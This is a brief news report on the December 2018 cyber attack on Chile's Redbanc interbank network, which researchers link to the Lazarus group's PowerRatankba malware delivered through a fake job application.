The recently disclosed cyber attack on the Chilean interbank network Redbanc which took place in December 2018, may have been carried out by North Korea-linked advanced persistent threat (APT) group Lazarus.
The attack involved PowerRatankba, a malware toolkit with ties to APT group represents the latest known example of Lazarus-affiliated tools being deployed within financially motivated activity targeted toward financial institutions in Latin America, FlashPoint researchers said in a blog post.
The intrusion reportedly occurred when the malware was delivered via a trusted Redbanc IT professional who clicked a link to apply for a job opening found through social media. The applicant was ultimately and unwittingly tricked into executing the payload, researchers said.
The malware’s dropper is displays as a job application while downloading and executing PowerRatankba.
Flashpoint researchers described the dropper sample as a Microsoft Visual C#/ Basic .NET (v4.0.30319)-compiled executable that contains the logic to call the server and download a PowerRatankba PowerShell reconnaissance tool.
“Lazarus attacks appear to reportedly rely on social media and trusted relationships, which may elevate their abilities to execute and install their payloads,” the post said. “As such, security awareness training—especially that which pertains to social media and social engineering—is also recommended.”
Proofpoint researchers, in a separate post, described PowerRatankba as a newer reconnaissance and downloader implant tool leveraged by Lazarus to fingerprint and obtain information about compromised machines.